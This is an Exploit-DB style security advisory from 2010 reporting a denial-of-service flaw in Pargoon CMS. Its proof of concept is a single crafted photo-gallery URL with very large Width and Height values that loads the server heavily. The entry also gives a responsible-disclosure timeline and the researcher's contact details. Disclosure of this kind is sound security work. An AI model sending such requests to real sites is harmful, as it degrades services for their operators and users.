Pargoon CMS - Denial of Service

EDB-ID:

12555

CVE:

N/A


Platform:

Multiple

Published:

2010-05-10

#################################################################  
# Securitylab.ir
#################################################################  
# Application Info:
# Name: Pargoon
# Vendor: http://www.vestasoft.ir
#################################################################  
# Vulnerability Info:
# Type: DOS
# Risk: Medium
# 2010-01-17 - Found Vulnerability
# 2010-01-19 - Vendor notified
# 2010-05-08 - Public disclosure
#################################################################
Vulnerability:  
http://site.irPhotoGallery/General+Photos/160.jpg?Width=10000&Height=10000
With setting of large values of width and height it's possible to create
large load at the server.
#################################################################  
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################